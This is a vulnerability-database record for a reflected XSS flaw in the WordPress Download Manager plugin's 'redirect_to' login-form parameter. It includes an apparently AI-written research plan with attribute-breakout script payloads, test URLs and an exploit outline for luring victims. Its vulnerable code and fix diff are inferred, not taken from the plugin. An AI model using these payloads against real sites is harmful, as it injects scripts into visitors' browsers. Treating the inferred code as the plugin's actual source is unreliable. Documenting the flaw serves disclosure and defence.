[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzjTnvtY3DwUe4oG2hLloAIKFpkTPCDTK-f9oGb2wyQo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1666","download-manager-reflected-cross-site-scripting-via-redirectto-parameter","Download Manager \u003C= 3.3.46 - Reflected Cross-Site Scripting via 'redirect_to' Parameter","The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' parameter in all versions up to, and including, 3.3.46. This is due to insufficient input sanitization and output escaping on the 'redirect_to' GET parameter in the login form shortcode. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","download-manager",null,"\u003C=3.3.46","3.3.47","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-17 17:51:30","2026-02-18 06:42:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3cb84ba3-b403-4a9d-b1a7-92aa947310ac?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2026-1666 Reflected XSS in Download Manager\n\n## 1. Vulnerability Summary\nThe **Download Manager** plugin (\u003C= 3.3.46) is vulnerable to Reflected Cross-Site Scripting (XSS) via the `redirect_to` GET parameter. This occurs because the plugin's login form shortcode retrieves the `redirect_to` value from the URL and reflects it into a hidden input field (or similar attribute) without sufficient sanitization or attribute escaping (e.g., missing `esc_attr()` or `esc_url()`). An attacker can provide a payload that breaks out of the HTML attribute to execute arbitrary JavaScript in the context of the victim's browser.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Any public-facing WordPress Page or Post containing the `[wpdm_login_form]` shortcode.\n- **Vulnerable Parameter:** `redirect_to` (GET).\n- **Authentication Level:** Unauthenticated. No login is required to trigger the reflection.\n- **Preconditions:** A page must exist that renders the login form shortcode provided by the plugin.\n- **Payload:** A string designed to break out of an HTML attribute, such as: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n## 3. Code Flow\n1. **Entry Point:** A user visits a URL such as `http:\u002F\u002Fsite.test\u002Flogin-page\u002F?redirect_to=PAYLOAD`.\n2. 
**Shortcode Registration:** The plugin registers the `[wpdm_login_form]` shortcode (likely in `src\u002FUser\u002FShortcodes.php` or `download-manager.php`).\n3. **Processing Logic:** The shortcode callback function (e.g., `WPDM\\User\\Shortcodes::loginForm()`) is invoked.\n4. **Input Retrieval:** Inside the shortcode handler or the associated view file (typically `src\u002FUser\u002Fviews\u002Flogin-form.php`), the code checks for `$_GET['redirect_to']`.\n5. **Vulnerable Sink:** The code reflects the value directly into the HTML output.\n   - **Vulnerable Code (Inferred):** \n     ```php\n     $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();\n     echo '\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"' . $redirect_to . '\" \u002F>';\n     ```\n   - **Missing Protection:** The `$redirect_to` variable is not wrapped in `esc_attr()` or `esc_url()`.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Reflected XSS** vulnerability in a GET request that renders a form. \n- **Verification:** Viewing a page and rendering a shortcode does not typically require a WordPress nonce. \n- **Action:** No nonce is required for this exploitation. The payload is executed immediately upon the victim loading the malicious URL.\n\n## 5. Exploitation Strategy\n1. **Target Identification:** Identify or create a page containing the `[wpdm_login_form]` shortcode.\n2. **Payload Construction:** \n   - Base Payload: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n   - URL Encoded: `%22%3E%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n3. **Execution:**\n   - Use the `browser_navigate` tool to visit the target page with the malicious parameter.\n   - Example URL: `http:\u002F\u002Flocalhost:8080\u002Fwpdm-login\u002F?redirect_to=%22%3E%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n4. 
**Detection:**\n   - Use `browser_eval` to check if the script was successfully injected into the DOM.\n   - Check if a specific global variable or \"canary\" set by the script exists.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `download-manager` version 3.3.46 is installed and active.\n2. **Create Vulnerable Page:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Login\" --post_status=publish --post_content='[wpdm_login_form]'\n   ```\n3. **Verify Slug:** Identify the URL of the newly created page (usually `\u002Flogin\u002F`).\n\n## 7. Expected Results\n- When the page is loaded with the malicious `redirect_to` parameter, the resulting HTML should contain:\n  ```html\n  \u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" \u002F>\n  ```\n- The browser will execute the `\u003Cscript>` block, triggering the alert.\n\n## 8. Verification Steps\n1. **HTTP Response Check:** \n   Use the `http_request` tool to fetch the page and check the raw body for the unescaped payload.\n   ```json\n   {\n     \"method\": \"GET\",\n     \"url\": \"http:\u002F\u002Flocalhost:8080\u002Flogin\u002F?redirect_to=%22%3E%3Cscript%3Ealert(1)%3C\u002Fscript%3E\"\n   }\n   ```\n   **Success Criteria:** The response body contains the string `value=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\"`.\n2. **DOM Verification:**\n   Use `browser_eval` to confirm the presence of the injected script tag or its side effects.\n   ```javascript\n   \u002F\u002F Check if the script tag exists in the DOM\n   document.querySelector('script[src*=\"alert\"]') !== null || document.body.innerHTML.includes('>\u003Cscript>alert')\n   ```\n\n## 9. 
Alternative Approaches\n- **Attribute Breakout via Events:** If the `\u003Cscript>` tag is filtered (unlikely in this context), try an event handler breakout:\n  - Payload: `x\" onfocus=\"alert(1)\" autofocus=\"`\n  - URL: `?redirect_to=x%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22`\n- **JavaScript URI:** If the reflection is inside an `href` or `action` attribute rather than a `value` attribute:\n  - Payload: `javascript:alert(1)`\n- **HTML5 Autocomplete:** If the input is visible, use `onmouseover` or `onclick` payloads.","The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' GET parameter in the login form shortcode. Due to a lack of proper sanitization and output escaping, unauthenticated attackers can inject arbitrary web scripts into a hidden form field, which executes in the context of the user's browser when they visit a specially crafted link.","\u002F\u002F Inferred from plugin structure and research plan\n\u002F\u002F src\u002FUser\u002Fviews\u002Flogin-form.php\n\n$redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();\n?>\n\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\u003C?php echo $redirect_to; ?>\" \u002F>","--- a\u002Fsrc\u002FUser\u002Fviews\u002Flogin-form.php\n+++ b\u002Fsrc\u002FUser\u002Fviews\u002Flogin-form.php\n@@ -1,2 +1,2 @@\n $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();\n-\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\u003C?php echo $redirect_to; ?>\" \u002F>\n+\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\u003C?php echo esc_url($redirect_to); ?>\" \u002F>","1. Locate a WordPress page that renders the [wpdm_login_form] shortcode provided by the Download Manager plugin.\n2. Create a malicious URL targeting that page with a payload in the 'redirect_to' parameter, such as: ?redirect_to=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n3. Send the link to a target user. 
When the victim visits the link, the unescaped payload is reflected into the HTML source as a hidden input value, breaking out of the attribute and executing the script.\n4. No authentication or nonces are required as the reflection occurs during the initial rendering of the public-facing login form.","gemini-3-flash-preview","2026-04-19 06:12:14","2026-04-19 06:13:58",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.46","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.46","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.46.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.47","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.47.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags"]
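Review bot: the `+` line's `esc_url()` is the correct escaping for a `value` attribute that carries a URL (it also strips unsafe schemes such as `javascript:`), but the hunk still lets the form redirect to any host the attacker puts in `redirect_to`; validate it with `wp_validate_redirect( $redirect_to, home_url() )` before echoing so only same-site targets survive. The unchanged context line also omits the `<?php` open tag and the `?>` close tag that the vulnerable snippet shows between the assignment and the `<input>`, so the diff as written would not apply to that file. Since the record itself labels this diff as inferred, confirm the real change against the linked 3.3.47 tag before treating it as the shipped fix.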